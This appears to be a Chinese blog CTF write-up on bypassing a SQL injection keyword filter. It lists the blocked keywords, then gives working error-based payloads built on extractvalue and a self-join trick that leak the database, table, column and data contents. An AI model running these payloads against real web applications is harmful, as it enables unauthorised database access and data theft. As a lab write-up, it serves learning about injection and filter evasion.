-
sql报错注入和联合注入
- 过滤:
- as
- IF
- rand()
- LEFT
- by
- update
- =
- substring
- handler
- union
- floor
- benchmark
- COLUMN
- UPDATE
- &
- sys.schema_auto_increment_columns
- &&
- '1'='1'
- database
- case
- AND
- right
- CAST
- FLOOR
- left
- updatexml
- DATABASES
- BENCHMARK
- BY
- sleep
- DATABASE
- insert
- anandd
- ascii
- CAST()
其实一开始想到的是布尔盲注,因为输入1会返回txw4ever,输入0返回空白,但是禁用了ascii函数,禁用了updatexml函数,但是可以使用extractvalue函数。
database被禁,所以可以考虑用访问一个不存在的数据库来返回数据库。
- 1'||(select * from aa)#或者将||换成or,爆出sqlsql库。
- -1' || extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema like 'sqlsql')))#
- 爆出output表
- -1' || extractvalue(1,concat(0x5c,(select*from (select*from output a join output b)c)))#
- 爆出data列名
- -1' || extractvalue(1,mid(concat(0x7e,(select data from output)),1,30))#
- -1' || extractvalue(1,mid(concat(0x7e,(select data from output)),10,40))#
由于as也被过滤,无列名注入可以用join 连接
首先自连接查询出来的表,没有using条件的结果是两张表的笛卡尔积,那么列名必然会有重复的部分,而主键是不允许重复的,所以查询出来会报错,也就把列名爆出来了
select*from (select*from output a join output b)c -
相关阅读:
Nuxt.js 应用中的 kit:compatibility 事件钩子详解
Unity Shader - if 和 keyword 的指令比较
【开发篇】十二、缓存框架JetCache
JS下载地图离线数据,前端下载谷歌离线地图
BookStack 详解及 Docker-Compose 部署
【Java】ListIterator
发布一个Visual Studio 2022 插件,可以自动完成构造函数依赖注入代码
Unity --- 导航网格 与 导航的使用
ModStartCMS v5.1.0 数据采集接口,登录自动注册
linux 功能性命令合集(持续更新)
- 原文地址:https://blog.csdn.net/m0_73847654/article/details/134534980
